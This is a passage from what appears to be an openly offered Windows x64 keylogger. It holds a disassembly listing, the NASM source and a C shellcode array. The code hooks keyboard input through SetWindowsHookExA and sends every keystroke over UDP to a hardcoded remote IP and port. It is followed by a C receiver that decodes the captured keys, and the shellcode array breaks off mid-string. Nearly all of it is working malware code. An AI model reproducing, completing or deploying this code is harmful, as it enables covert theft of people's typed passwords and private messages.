+ 36: 48 8d 3c 24 lea rdi,[rsp] + 3a: 41 57 push r15 + 3c: 41 54 push r12 + 3e: 57 push rdi + 3f: 48 b8 48 45 52 45 49 movabs rax,0x5349544945524548 + 46: 54 49 53 + 49: 50 push rax + 4a: 48 31 c0 xor rax,rax + 4d: 66 b8 cc 01 mov ax,0x1cc + 51: 48 01 c3 add rbx,rax + 54: 53 push rbx + 55: 48 89 f1 mov rcx,rsi + 58: 48 8d 93 6e ff ff ff lea rdx,[rbx-0x92] + 5f: 4d 31 c0 xor r8,r8 + 62: 41 b0 02 mov r8b,0x2 + 65: 49 89 f9 mov r9,rdi + 68: ff d3 call rbx + 6a: 41 5d pop r13 + 6c: 48 31 c0 xor rax,rax + 6f: 50 push rax + 70: 50 push rax + 71: 48 b8 77 73 32 5f 33 movabs rax,0x642e32335f327377 + 78: 32 2e 64 + 7b: 48 89 04 24 mov QWORD PTR [rsp],rax + 7f: 66 c7 44 24 08 6c 6c mov WORD PTR [rsp+0x8],0x6c6c + 86: 48 8d 0c 24 lea rcx,[rsp] + 8a: 48 8b 77 08 mov rsi,QWORD PTR [rdi+0x8] + 8e: 48 83 ec 28 sub rsp,0x28 + 92: ff d6 call rsi + 94: 48 96 xchg rsi,rax + 96: 48 8d 4c 24 28 lea rcx,[rsp+0x28] + 9b: c7 01 75 73 65 72 mov DWORD PTR [rcx],0x72657375 + a1: ff d0 call rax + a3: 48 89 c1 mov rcx,rax + a6: 49 8d 55 8c lea rdx,[r13-0x74] + aa: 4d 31 c0 xor r8,r8 + ad: 41 b0 06 mov r8b,0x6 + b0: 4c 8d 4f 10 lea r9,[rdi+0x10] + b4: 41 ff d5 call r13 + b7: 48 89 f1 mov rcx,rsi + ba: 49 8d 55 e7 lea rdx,[r13-0x19] + be: 4d 31 c0 xor r8,r8 + c1: 41 b0 03 mov r8b,0x3 + c4: 4c 8d 4f 40 lea r9,[rdi+0x40] + c8: 41 ff d5 call r13 + cb: 48 83 c4 38 add rsp,0x38 + +00000000000000cf <_p3_>: + cf: 48 31 c9 xor rcx,rcx + d2: 66 b9 98 01 mov cx,0x198 + d6: 48 29 cc sub rsp,rcx + d9: 48 83 c1 6a add rcx,0x6a + dd: 48 8d 14 24 lea rdx,[rsp] + e1: 48 8b 5f 40 mov rbx,QWORD PTR [rdi+0x40] + e5: ff d3 call rbx + e7: 48 31 c9 xor rcx,rcx + ea: b1 02 mov cl,0x2 + ec: 51 push rcx + ed: 51 push rcx + ee: 5a pop rdx + ef: 41 58 pop r8 + f1: 41 b0 11 mov r8b,0x11 + f4: 48 8b 5f 48 mov rbx,QWORD PTR [rdi+0x48] + f8: ff d3 call rbx + fa: 48 89 47 08 mov QWORD PTR [rdi+0x8],rax + fe: 48 8b 1f mov rbx,QWORD PTR [rdi] + 101: 48 31 c9 xor rcx,rcx + 104: ff d3 call rbx + 106: 41 c6 07 02 mov BYTE PTR [r15],0x2 + 10a: 66 41 c7 47 02 db 83 mov WORD PTR [r15+0x2],0x83db + 111: 41 c7 47 04 c1 a1 c1 mov DWORD PTR [r15+0x4],0x63c1a1c1 + 118: 63 + 119: 4d 31 c9 xor r9,r9 + 11c: 41 51 push r9 + 11e: 41 51 push r9 + 120: 59 pop rcx + 121: 5a pop rdx + 122: b1 0d mov cl,0xd + 124: 49 89 c0 mov r8,rax + 127: b2 bc mov dl,0xbc + 129: 4c 01 ea add rdx,r13 + 12c: 48 8b 5f 10 mov rbx,QWORD PTR [rdi+0x10] + 130: ff d3 call rbx + +0000000000000132 <_p4_>: + 132: 49 8d 4c 24 08 lea rcx,[r12+0x8] + 137: 48 31 d2 xor rdx,rdx + 13a: 52 push rdx + 13b: 52 push rdx + 13c: 41 58 pop r8 + 13e: 41 59 pop r9 + 140: 48 8b 5f 28 mov rbx,QWORD PTR [rdi+0x28] + 144: ff d3 call rbx + 146: 49 8d 4c 24 08 lea rcx,[r12+0x8] + 14b: 48 8b 5f 30 mov rbx,QWORD PTR [rdi+0x30] + 14f: ff d3 call rbx + 151: 49 8d 4c 24 08 lea rcx,[r12+0x8] + 156: 48 8b 5f 38 mov rbx,QWORD PTR [rdi+0x38] + 15a: ff d3 call rbx + 15c: eb d4 jmp 132 <_p4_> + +000000000000015e : + 15e: 47 rex.RXB + 15f: 65 74 4d gs je 1af + 162: 6f outs dx,DWORD PTR ds:[rsi] + 163: 64 75 6c fs jne 1d2 + 166: 65 48 61 gs rex.W (bad) + 169: 6e outs dx,BYTE PTR ds:[rsi] + 16a: 64 6c fs ins BYTE PTR es:[rdi],dx + 16c: 65 41 01 4c 6f 61 add DWORD PTR gs:[r15+rbp*2+0x61],ecx + 172: 64 4c 69 62 72 61 72 imul r12,QWORD PTR fs:[rdx+0x72],0x41797261 + 179: 79 41 + 17b: 01 53 65 add DWORD PTR [rbx+0x65],edx + +000000000000017c : + 17c: 53 push rbx + 17d: 65 74 57 gs je 1d7 + 180: 69 6e 64 6f 77 73 48 imul ebp,DWORD PTR [rsi+0x64],0x4873776f + 187: 6f outs dx,DWORD PTR ds:[rsi] + 188: 6f outs dx,DWORD PTR ds:[rsi] + 189: 6b 45 78 41 imul eax,DWORD PTR [rbp+0x78],0x41 + 18d: 01 43 61 add DWORD PTR [rbx+0x61],eax + 190: 6c ins BYTE PTR es:[rdi],dx + 191: 6c ins BYTE PTR es:[rdi],dx + 192: 4e rex.WRX + 193: 65 78 74 gs js 20a + 196: 48 6f rex.W outs dx,DWORD PTR ds:[rsi] + 198: 6f outs dx,DWORD PTR ds:[rsi] + 199: 6b 45 78 01 imul eax,DWORD PTR [rbp+0x78],0x1 + 19d: 47 rex.RXB + 19e: 65 74 4b gs je 1ec + 1a1: 65 79 53 gs jns 1f7 + 1a4: 74 61 je 207 + 1a6: 74 65 je 20d + 1a8: 01 47 65 add DWORD PTR [rdi+0x65],eax + 1ab: 74 4d je 1fa + 1ad: 65 73 73 gs jae 223 + 1b0: 61 (bad) + 1b1: 67 65 41 01 54 72 61 add DWORD PTR gs:[r10d+esi*2+0x61],edx + 1b8: 6e outs dx,BYTE PTR ds:[rsi] + 1b9: 73 6c jae 227 + 1bb: 61 (bad) + 1bc: 74 65 je 223 + 1be: 4d rex.WRB + 1bf: 65 73 73 gs jae 235 + 1c2: 61 (bad) + 1c3: 67 65 01 44 69 73 add DWORD PTR gs:[ecx+ebp*2+0x73],eax + 1c9: 70 61 jo 22c + 1cb: 74 63 je 230 + 1cd: 68 4d 65 73 73 push 0x7373654d + 1d2: 61 (bad) + 1d3: 67 65 41 01 57 53 add DWORD PTR gs:[r15d+0x53],edx + +00000000000001d7 : + 1d7: 57 push rdi + 1d8: 53 push rbx + 1d9: 41 53 push r11 + 1db: 74 61 je 23e + 1dd: 72 74 jb 253 + 1df: 75 70 jne 251 + 1e1: 01 73 6f add DWORD PTR [rbx+0x6f],esi + 1e4: 63 6b 65 movsxd ebp,DWORD PTR [rbx+0x65] + 1e7: 74 01 je 1ea + 1e9: 73 65 jae 250 + 1eb: 6e outs dx,BYTE PTR ds:[rsi] + 1ec: 64 74 6f fs je 25e + 1ef: 01 56 57 add DWORD PTR [rsi+0x57],edx + +00000000000001f0 : + 1f0: 56 push rsi + 1f1: 57 push rdi + 1f2: 41 50 push r8 + 1f4: 52 push rdx + 1f5: 41 51 push r9 + 1f7: 51 push rcx + 1f8: 41 5b pop r11 + 1fa: 48 31 db xor rbx,rbx + 1fd: 53 push rbx + 1fe: 53 push rbx + 1ff: 5a pop rdx + 200: 58 pop rax + 201: 8b 59 3c mov ebx,DWORD PTR [rcx+0x3c] + 204: 48 01 cb add rbx,rcx + 207: b2 88 mov dl,0x88 + 209: 8b 04 13 mov eax,DWORD PTR [rbx+rdx*1] + 20c: 48 01 c8 add rax,rcx + 20f: 48 31 d2 xor rdx,rdx + 212: 52 push rdx + 213: 52 push rdx + 214: 52 push rdx + 215: 41 58 pop r8 + 217: 41 59 pop r9 + 219: 41 5a pop r10 + 21b: 44 8b 40 20 mov r8d,DWORD PTR [rax+0x20] + 21f: 4d 01 d8 add r8,r11 + 222: 44 8b 48 24 mov r9d,DWORD PTR [rax+0x24] + 226: 4d 01 d9 add r9,r11 + 229: 44 8b 50 1c mov r10d,DWORD PTR [rax+0x1c] + 22d: 4d 01 da add r10,r11 + 230: 48 31 d2 xor rdx,rdx + 233: 48 31 f6 xor rsi,rsi + 236: 56 push rsi + 237: 59 pop rcx + 238: 41 8b 34 90 mov esi,DWORD PTR [r8+rdx*4] + 23c: 4c 01 de add rsi,r11 + 23f: 48 8b 7c 24 08 mov rdi,QWORD PTR [rsp+0x8] + 244: 48 31 c0 xor rax,rax + 247: 8a 04 0f mov al,BYTE PTR [rdi+rcx*1] + 24a: 48 ff c1 inc rcx + 24d: 3c 01 cmp al,0x1 + 24f: 75 f6 jne 247 + 251: 48 ff c2 inc rdx + 254: 51 push rcx + 255: 48 ff c9 dec rcx + 258: 48 87 f7 xchg rdi,rsi + 25b: f3 a6 repz cmps BYTE PTR ds:[rsi],BYTE PTR es:[rdi] + 25d: 59 pop rcx + 25e: 75 d3 jne 233 + 260: 48 ff ca dec rdx + 263: 48 8b 7c 24 08 mov rdi,QWORD PTR [rsp+0x8] + 268: 48 01 cf add rdi,rcx + 26b: 48 89 7c 24 08 mov QWORD PTR [rsp+0x8],rdi + 270: 48 31 db xor rbx,rbx + 273: 53 push rbx + 274: 58 pop rax + 275: 66 41 8b 1c 51 mov bx,WORD PTR [r9+rdx*2] + 27a: 41 8b 04 9a mov eax,DWORD PTR [r10+rbx*4] + 27e: 4c 01 d8 add rax,r11 + 281: 48 8b 1c 24 mov rbx,QWORD PTR [rsp] + 285: 48 89 03 mov QWORD PTR [rbx],rax + 288: 48 83 c3 08 add rbx,0x8 + 28c: 48 89 1c 24 mov QWORD PTR [rsp],rbx + 290: 48 8b 5c 24 10 mov rbx,QWORD PTR [rsp+0x10] + 295: 48 ff cb dec rbx + 298: 48 89 5c 24 10 mov QWORD PTR [rsp+0x10],rbx + 29d: 48 31 d2 xor rdx,rdx + 2a0: 48 39 d3 cmp rbx,rdx + 2a3: 75 8e jne 233 + 2a5: 48 83 c4 18 add rsp,0x18 + 2a9: 5f pop rdi + 2aa: 5e pop rsi + 2ab: c3 ret + +00000000000002ac <_proceed_>: + 2ac: 48 83 ec 58 sub rsp,0x58 + 2b0: 41 50 push r8 + 2b2: 52 push rdx + 2b3: 51 push rcx + 2b4: 48 31 f6 xor rsi,rsi + 2b7: 48 b8 48 45 52 45 49 movabs rax,0x5349544945524548 + 2be: 54 49 53 + +00000000000002c1 : + 2c1: 4c 8b 14 34 mov r10,QWORD PTR [rsp+rsi*1] + 2c5: 48 ff c6 inc rsi + 2c8: 49 39 c2 cmp r10,rax + 2cb: 75 f4 jne 2c1 + 2cd: 48 83 c6 07 add rsi,0x7 + 2d1: 48 8d 1c 34 lea rbx,[rsp+rsi*1] + 2d5: 48 8b 3b mov rdi,QWORD PTR [rbx] + 2d8: 4c 8b 63 08 mov r12,QWORD PTR [rbx+0x8] + 2dc: 4c 8b 7b 10 mov r15,QWORD PTR [rbx+0x10] + 2e0: 48 85 c9 test rcx,rcx + 2e3: 75 68 jne 34d <_out_> + 2e5: 48 31 db xor rbx,rbx + 2e8: b3 01 mov bl,0x1 + 2ea: 48 c1 e3 08 shl rbx,0x8 + 2ee: 48 39 da cmp rdx,rbx + 2f1: 75 5a jne 34d <_out_> + 2f3: 48 8b 5f 20 mov rbx,QWORD PTR [rdi+0x20] + 2f7: 48 31 c9 xor rcx,rcx + 2fa: b1 14 mov cl,0x14 + 2fc: ff d3 call rbx + 2fe: 66 41 89 04 24 mov WORD PTR [r12],ax + 303: 48 8b 5f 20 mov rbx,QWORD PTR [rdi+0x20] + 307: 48 31 c9 xor rcx,rcx + 30a: b1 10 mov cl,0x10 + 30c: ff d3 call rbx + 30e: 66 41 89 44 24 02 mov WORD PTR [r12+0x2],ax + 314: 48 8b 5c 24 10 mov rbx,QWORD PTR [rsp+0x10] + 319: 8b 03 mov eax,DWORD PTR [rbx] + 31b: 41 89 44 24 04 mov DWORD PTR [r12+0x4],eax + 320: 48 83 ec 58 sub rsp,0x58 + 324: 48 8b 4f 08 mov rcx,QWORD PTR [rdi+0x8] + 328: 41 54 push r12 + 32a: 5a pop rdx + 32b: 4d 31 c9 xor r9,r9 + 32e: 41 51 push r9 + 330: 41 58 pop r8 + 332: 41 b0 10 mov r8b,0x10 + 335: 4c 89 7c 24 20 mov QWORD PTR [rsp+0x20],r15 + 33a: 4c 89 44 24 28 mov QWORD PTR [rsp+0x28],r8 + 33f: 49 83 e8 08 sub r8,0x8 + 343: 48 8b 5f 50 mov rbx,QWORD PTR [rdi+0x50] + 347: ff d3 call rbx + 349: 48 83 c4 58 add rsp,0x58 + +000000000000034d <_out_>: + 34d: 5a pop rdx + 34e: 41 58 pop r8 + 350: 41 59 pop r9 + 352: 48 8b 5f 18 mov rbx,QWORD PTR [rdi+0x18] + 356: 48 31 c9 xor rcx,rcx + 359: ff d3 call rbx + 35b: 48 83 c4 58 add rsp,0x58 + 35f: c3 ret + + + + + + + +*/ + + + + +/* +section .text + global _start +_start: + +jmp short p1 + +_init_: + +xor rdx,rdx +mov rax,[gs:rdx+0x60] ; getting pointer of PEB structure +mov rax,[rax+24] ;rax=PPEB->Ldr +mov rax,[rax+32] ;Ldr->InMemoryOrderModuleList +mov rsi,[rax] +mov rax,[rsi] +mov rsi,[rax+32] ;kernel32.dll base address + +pop rbx ;address of _p2_ + +push rbx +ret; transferring execution control to _p2_ + + + +p1: +call _init_ + + + +;----------------------------------------------------------------------------------------------------- + +_p2_: + + +push rdx +push rdx +lea r15,[rsp] +sub rsp,56 +lea r12,[rsp] ; pointer important data (2 short int + 1 DWORD + 48 byte MSG structure ) +sub rsp,88 +lea rdi,[rsp] ; pointer to function address + + + +push r15 +push r12 +push rdi +mov rax,'HEREITIS' +push rax + +xor rax,rax +mov ax,get_addr-_p2_ +add rbx,rax ; address of get_addr + +push rbx ;reserving future use + +mov rcx,rsi + + +lea rdx,[rbx-(get_addr-kernel32_func)] + + +xor r8,r8 +mov r8b,2 +mov r9,rdi +call rbx ;loading kernel32_func functions + + +;------------------------------------------------------------------------------------- + +pop r13 ;address of get_addr + +;loading ws2_32.dll + +xor rax,rax +push rax +push rax + +mov rax,'ws2_32.d' +mov [rsp],rax +mov [rsp+8],word 'll' +lea rcx,[rsp] +mov rsi,[rdi+8] +sub rsp,40 + +call rsi +xchg rsi,rax + +;---------------------------------------------------------- +;loading user32.dll +lea rcx,[rsp+40] +mov [rcx],dword 'user' + +call rax + + +;==================================== +;loading user32.dll functions +mov rcx,rax +lea rdx,[r13-(get_addr-user32_func)] +xor r8,r8 +mov r8b,6 +lea r9,[rdi+16] ;user32.dll functions from 16 +call r13 + +;=================================== +;loading ws2_32.dll functions + +mov rcx,rsi +lea rdx,[r13-(get_addr-ws2_32_func)] +xor r8,r8 +mov r8b,3 +lea r9,[rdi+64] ;ws2_32.dll functions from 64 +call r13 + +add rsp,56 +;===========================================All necessary functions are loaded. Time to proceed to main task ======================================== + +_p3_: + +xor rcx,rcx +mov cx,408 +sub rsp,rcx +add rcx,106 +lea rdx,[rsp] +mov rbx,[rdi+64] ;WSAStartup() + +call rbx + + +xor rcx,rcx + + + + +mov cl,2 +push rcx +push rcx +pop rdx +pop r8 +mov r8b,17 +mov rbx,[rdi+72] ;socket() +call rbx + +mov [rdi+8],rax ;SOCKET + + + + + +mov rbx,[rdi] ; GetModuleHandleA() +xor rcx,rcx +call rbx + +;------------------------------------ + +mov [r15],byte 2 +mov [r15+2],word 0x83db ;port change it +mov [r15+4],dword 0x63c1a1c1 ;IP change it + +;----------------------------------- + + + + +xor r9,r9 +push r9 +push r9 +pop rcx +pop rdx +mov cl,13 +mov r8,rax +mov dl,_proceed_-get_addr +add rdx,r13 +mov rbx,[rdi+16] ;SetWindowsHookExA() + +call rbx + + + +_p4_: + +lea rcx,[r12+8] +xor rdx,rdx +push rdx +push rdx +pop r8 +pop r9 +mov rbx,[rdi+40] ;GetMessageA() + + + +call rbx + + + + +lea rcx,[r12+8] +mov rbx,[rdi+48] ;TranslateMessage() + +call rbx + +lea rcx,[r12+8] +mov rbx,[rdi+56] ;DispatchMessageA() + +call rbx + + +jmp short _p4_ + + + +;---------------------------------------------------------------------------------------- +kernel32_func: +db 'GetModuleHandleA',1,'LoadLibraryA',1 + + +user32_func: +db 'SetWindowsHookExA',1,'CallNextHookEx',1,'GetKeyState',1,'GetMessageA',1,'TranslateMessage',1,'DispatchMessageA',1 + +ws2_32_func: +db 'WSAStartup',1,'socket',1,'sendto',1 + + +get_addr: ; rcx=dll base , rdx=function name string address , r8=number of functions , r9=address of buffer +db 0x56,0x57,0x41,0x50,0x52,0x41,0x51,0x51,0x41,0x5b,0x48,0x31,0xdb,0x53,0x53,0x5a,0x58,0x8b,0x59,0x3c,0x48,0x01,0xcb,0xb2,0x88,0x8b,0x04,0x13,0x48,0x01,0xc8,0x48,0x31,0xd2,0x52,0x52,0x52,0x41,0x58,0x41,0x59,0x41,0x5a,0x44,0x8b,0x40,0x20,0x4d,0x01,0xd8,0x44,0x8b,0x48,0x24,0x4d,0x01,0xd9,0x44,0x8b,0x50,0x1c,0x4d,0x01,0xda,0x48,0x31,0xd2,0x48,0x31,0xf6,0x56,0x59,0x41,0x8b,0x34,0x90,0x4c,0x01,0xde,0x48,0x8b,0x7c,0x24,0x08,0x48,0x31,0xc0,0x8a,0x04,0x0f,0x48,0xff,0xc1,0x3c,0x01,0x75,0xf6,0x48,0xff,0xc2,0x51,0x48,0xff,0xc9,0x48,0x87,0xf7,0xf3,0xa6,0x59,0x75,0xd3,0x48,0xff,0xca,0x48,0x8b,0x7c,0x24,0x08,0x48,0x01,0xcf,0x48,0x89,0x7c,0x24,0x08,0x48,0x31,0xdb,0x53,0x58,0x66,0x41,0x8b,0x1c,0x51,0x41,0x8b,0x04,0x9a,0x4c,0x01,0xd8,0x48,0x8b,0x1c,0x24,0x48,0x89,0x03,0x48,0x83,0xc3,0x08,0x48,0x89,0x1c,0x24,0x48,0x8b,0x5c,0x24,0x10,0x48,0xff,0xcb,0x48,0x89,0x5c,0x24,0x10,0x48,0x31,0xd2,0x48,0x39,0xd3,0x75,0x8e,0x48,0x83,0xc4,0x18,0x5f,0x5e,0xc3 + +;------------------------------------------------------------------------------------------------------------------- +_proceed_: + +sub rsp,88 +push r8 +push rdx +push rcx + + + + +;--------------------------------------------- +xor rsi,rsi +mov rax,'HEREITIS' +find: + + +mov r10,[rsp+rsi] +inc rsi +cmp r10,rax +jne find + +add rsi,7 +lea rbx,[rsp+rsi] +mov rdi,[rbx] +mov r12,[rbx+8] +mov r15,[rbx+16] + + +;------------------------------------------------ +test rcx,rcx +jnz short _out_ + +xor rbx,rbx +mov bl,1 +shl rbx,8 + +cmp rdx,rbx +jne short _out_ + + +;-------------------------------------------------------- + +mov rbx,[rdi+32] ;GetKeyState(VK_CAPITAL) +xor rcx,rcx +mov cl,0x14 +call rbx + +mov [r12],ax + +mov rbx,[rdi+32] ;GetKeyState(VK_SHIFT) +xor rcx,rcx +mov cl,0x10 +call rbx + +mov [r12+2],ax + + + + +;------------------------------- +;sending keystrokes +mov rbx,[rsp+16] +mov eax,[rbx] +mov [r12+4],eax ;Virtual key code + +sub rsp,88 +mov rcx,[rdi+8] ;SOCKET +push r12 +pop rdx + +xor r9,r9 +push r9 + +pop r8 +mov r8b,16 +mov [rsp+32],r15 +mov [rsp+40],r8 +sub r8,8 + +mov rbx,[rdi+80] +call rbx +add rsp,88 + + +;----------------------------------------------------------- + +_out_: + +pop rdx +pop r8 +pop r9 + + +mov rbx,[rdi+24] + +xor rcx,rcx + +call rbx + + +add rsp,88 + + +ret + + + + + + +*/ + + +/* + +//keylogger Handler + +#include +#include +#include + +#pragma pack(1) + +typedef struct key +{ + short caps; + short shift; + DWORD vkcode; +}KEYDATA; + + +char * Determine(BOOL caps,BOOL shift,DWORD code) +{ + char * key; + switch (code) // SWITCH ON INT + { + case 0x41: key = caps ? (shift ? "a" : "A") : (shift ? "A" : "a"); break; + case 0x42: key = caps ? (shift ? "b" : "B") : (shift ? "B" : "b"); break; + case 0x43: key = caps ? (shift ? "c" : "C") : (shift ? "C" : "c"); break; + case 0x44: key = caps ? (shift ? "d" : "D") : (shift ? "D" : "d"); break; + case 0x45: key = caps ? (shift ? "e" : "E") : (shift ? "E" : "e"); break; + case 0x46: key = caps ? (shift ? "f" : "F") : (shift ? "F" : "f"); break; + case 0x47: key = caps ? (shift ? "g" : "G") : (shift ? "G" : "g"); break; + case 0x48: key = caps ? (shift ? "h" : "H") : (shift ? "H" : "h"); break; + case 0x49: key = caps ? (shift ? "i" : "I") : (shift ? "I" : "i"); break; + case 0x4A: key = caps ? (shift ? "j" : "J") : (shift ? "J" : "j"); break; + case 0x4B: key = caps ? (shift ? "k" : "K") : (shift ? "K" : "k"); break; + case 0x4C: key = caps ? (shift ? "l" : "L") : (shift ? "L" : "l"); break; + case 0x4D: key = caps ? (shift ? "m" : "M") : (shift ? "M" : "m"); break; + case 0x4E: key = caps ? (shift ? "n" : "N") : (shift ? "N" : "n"); break; + case 0x4F: key = caps ? (shift ? "o" : "O") : (shift ? "O" : "o"); break; + case 0x50: key = caps ? (shift ? "p" : "P") : (shift ? "P" : "p"); break; + case 0x51: key = caps ? (shift ? "q" : "Q") : (shift ? "Q" : "q"); break; + case 0x52: key = caps ? (shift ? "r" : "R") : (shift ? "R" : "r"); break; + case 0x53: key = caps ? (shift ? "s" : "S") : (shift ? "S" : "s"); break; + case 0x54: key = caps ? (shift ? "t" : "T") : (shift ? "T" : "t"); break; + case 0x55: key = caps ? (shift ? "u" : "U") : (shift ? "U" : "u"); break; + case 0x56: key = caps ? (shift ? "v" : "V") : (shift ? "V" : "v"); break; + case 0x57: key = caps ? (shift ? "w" : "W") : (shift ? "W" : "w"); break; + case 0x58: key = caps ? (shift ? "x" : "X") : (shift ? "X" : "x"); break; + case 0x59: key = caps ? (shift ? "y" : "Y") : (shift ? "Y" : "y"); break; + case 0x5A: key = caps ? (shift ? "z" : "Z") : (shift ? "Z" : "z"); break; + // Sleep Key + case VK_SLEEP: key = "[SLEEP]"; break; + // Num Keyboard + case VK_NUMPAD0: key = "0"; break; + case VK_NUMPAD1: key = "1"; break; + case VK_NUMPAD2 : key = "2"; break; + case VK_NUMPAD3: key = "3"; break; + case VK_NUMPAD4: key = "4"; break; + case VK_NUMPAD5: key = "5"; break; + case VK_NUMPAD6: key = "6"; break; + case VK_NUMPAD7: key = "7"; break; + case VK_NUMPAD8: key = "8"; break; + case VK_NUMPAD9: key = "9"; break; + case VK_MULTIPLY: key = "*"; break; + case VK_ADD: key = "+"; break; + case VK_SEPARATOR: key = "-"; break; + case VK_SUBTRACT: key = "-"; break; + case VK_DECIMAL: key = "."; break; + case VK_DIVIDE: key = "/"; break; + // Function Keys + case VK_F1: key = "[F1]"; break; + case VK_F2: key = "[F2]"; break; + case VK_F3: key = "[F3]"; break; + case VK_F4: key = "[F4]"; break; + case VK_F5: key = "[F5]"; break; + case VK_F6: key = "[F6]"; break; + case VK_F7: key = "[F7]"; break; + case VK_F8: key = "[F8]"; break; + case VK_F9: key = "[F9]"; break; + case VK_F10: key = "[F10]"; break; + case VK_F11: key = "[F11]"; break; + case VK_F12: key = "[F12]"; break; + case VK_F13: key = "[F13]"; break; + case VK_F14: key = "[F14]"; break; + case VK_F15: key = "[F15]"; break; + case VK_F16: key = "[F16]"; break; + case VK_F17: key = "[F17]"; break; + case VK_F18: key = "[F18]"; break; + case VK_F19: key = "[F19]"; break; + case VK_F20: key = "[F20]"; break; + case VK_F21: key = "[F22]"; break; + case VK_F22: key = "[F23]"; break; + case VK_F23: key = "[F24]"; break; + case VK_F24: key = "[F25]"; break; + // Keys + case VK_NUMLOCK: key = "[NUM-LOCK]"; break; + case VK_SCROLL: key = "[SCROLL-LOCK]"; break; + case VK_BACK: key = "[BACK]"; break; + case VK_TAB: key = "[TAB]"; break; + case VK_CLEAR: key = "[CLEAR]"; break; + case VK_RETURN: key = "[ENTER]"; break; + case VK_SHIFT: key = "[SHIFT]"; break; + case VK_CONTROL: key = "[CTRL]"; break; + case VK_MENU: key = "[ALT]"; break; + case VK_PAUSE: key = "[PAUSE]"; break; + case VK_CAPITAL: key = "[CAP-LOCK]"; break; + case VK_ESCAPE: key = "[ESC]"; break; + case VK_SPACE: key = "[SPACE]"; break; + case VK_PRIOR: key = "[PAGEUP]"; break; + case VK_NEXT: key = "[PAGEDOWN]"; break; + case VK_END: key = "[END]"; break; + case VK_HOME: key = "[HOME]"; break; + case VK_LEFT: key = "[LEFT]"; break; + case VK_UP: key = "[UP]"; break; + case VK_RIGHT: key = "[RIGHT]"; break; + case VK_DOWN: key = "[DOWN]"; break; + case VK_SELECT: key = "[SELECT]"; break; + case VK_PRINT: key = "[PRINT]"; break; + case VK_SNAPSHOT: key = "[PRTSCRN]"; break; + case VK_INSERT: key = "[INS]"; break; + case VK_DELETE: key = "[DEL]"; break; + case VK_HELP: key = "[HELP]"; break; + // Number Keys with shift + case 0x30: key = shift ? ")" : "0"; break; + case 0x31: key = shift ? "!" : "1"; break; + case 0x32: key = shift ? "@" : "2"; break; + case 0x33: key = shift ? "#" : "3"; break; + case 0x34: key = shift ? "$" : "4"; break; + case 0x35: key = shift ? "%" : "5"; break; + case 0x36: key = shift ? "^" : "6"; break; + case 0x37: key = shift ? "&" : "7"; break; + case 0x38: key = shift ? "*" : "8"; break; + case 0x39: key = shift ? "(" : "9"; break; + // Windows Keys + case VK_LWIN: key = "[WIN]"; break; + case VK_RWIN: key = "[WIN]"; break; + case VK_LSHIFT: key = "[SHIFT]"; break; + case VK_RSHIFT: key = "[SHIFT]"; break; + case VK_LCONTROL: key = "[CTRL]"; break; + case VK_RCONTROL: key = "[CTRL]"; break; + // OEM Keys with shift + case VK_OEM_1: key = shift ? ":" : ";"; break; + case VK_OEM_PLUS: key = shift ? "+" : "="; break; + case VK_OEM_COMMA: key = shift ? "<" : ","; break; + case VK_OEM_MINUS: key = shift ? "_" : "-"; break; + case VK_OEM_PERIOD: key = shift ? ">" : "."; break; + case VK_OEM_2: key = shift ? "?" : "/"; break; + case VK_OEM_3: key = shift ? "~" : "`"; break; + case VK_OEM_4: key = shift ? "{" : "["; break; + case VK_OEM_5: key = shift ? "|" : "\\"; break; + case VK_OEM_6: key = shift ? "}" : "]"; break; + case VK_OEM_7: key = shift ? "\"" : "'"; break; //TODO: Escape this char: " + // Action Keys + case VK_PLAY: key = "[PLAY]";break; + case VK_ZOOM: key = "[ZOOM]";break; + case VK_OEM_CLEAR: key = "[CLEAR]";break; + case VK_CANCEL: key = "[CTRL-C]";break; + + default: key = "[UNK-KEY]";break; + } + return key; +} + + + +int main() +{ + int port; + SOCKET s; + struct sockaddr_in sr,cr; + WSADATA wsa; + KEYDATA keystrk; + char * n; + + printf("Enter Port Number To Listen: "); + scanf("%d",&port); + + if(WSAStartup(514,&wsa)) + { + printf("WSAStartup() Failed"); + return 0; + } + + if((s=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP))==INVALID_SOCKET) + { + printf("Failed To Create Socket..."); + return 0; + } + + ZeroMemory(&sr,16); + sr.sin_family=AF_INET; + sr.sin_port=htons(port); + + if(bind(s,(struct sockaddr *)&sr,16)) + { + printf("Failed To Bind.."); + return 0; + } + + port=16; //Why bother to declare a variable for int * fromlen + while(1) + { + recvfrom(s,(char *)&keystrk,8,0,(struct sockaddr *)&cr,&port); + n=Determine(keystrk.caps&0x0001,keystrk.shift>>15,keystrk.vkcode); + printf("%s",n); + } + return 0; +} + + + +*/ + + +#include +#include +#include +#include + +char shellcode[]="\xeb\x1d\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x40\x20\x48\x8b\x30\x48\x8b\x06\x48\x8b\x70\x20\x5b\x53\xc3\xe8\xde\xff\xff\xff\x52\x52\x4c\x8d\x3c\x24\x48\x83\xec\x38\x4c\x8d\x24\x24\x48\x83\xec\x58\x48\x8d\x3c\x24\x41\x57\x41\x54\x57\x48\xb8\x48\x45\x52\x45\x49\x54\x49\x53\x50\x48\x31\xc0\x66\xb8\xcc\x01\x48\x01\xc3\x53\x48\x89\xf1\x48\x8d\x93\x6e\xff\xff\xff\x4d\x31\xc0\x41\xb0\x02\x49\x89\xf9\xff\xd3\x41\x5d\x48\x31\xc0\x50\x50\x48\xb8\x77\x73\x32\x5f\x33\x32\x2e\x64\x48\x89\x04\x24\x66\xc7\x44\x24\x08\x6c\x6c\x48\x8d\x0c\x24\x48\x8b\x77\x08\x48\x83\xec\x28\xff\xd6\x48\x96\x48\x8d\x4c\x24\x28\xc7\x01\x75\x73\x65\x72\xff\xd0\x48\x89\xc1\x49\x8d\x55\x8c\x4d\x31\xc0\x41\xb0\x06\x4c\x8d\x4f\x10\x41\xff\xd5\x48\x89\xf1\x49\x8d\x55\xe7\x4d\x31\xc0\x41\xb0\x03\x4c\x8d\x4f\x40\x41\xff\xd5\x48\x83\xc4\x38\x48\x31\xc9\x66\xb9\x98\x01\x48\x29\xcc\x48\x83\xc1\x6a\x48\x8d\x14\x24\x48\x8b\x5f\x40\xff\xd3\x48\x31\xc9\xb1\x02\x51\x51\x5a\x41\x58\x41\xb0\x11\x48\x8b\x5f\x48\xff\xd3\x48\x89\x47\x08\x48\x8b\x1f\x48\x31\xc9\xff\xd3\x41\xc6\x07\x02\x66\x41\xc7\x47\x02\xdb\x83\x41\xc7\x47\x04\xc1\xa1\xc1\x63\x4d\x31\xc9\x41\x51\x41\x51\x59\x5a\xb1\x0d\x49\x89\xc0\xb2\xbc\x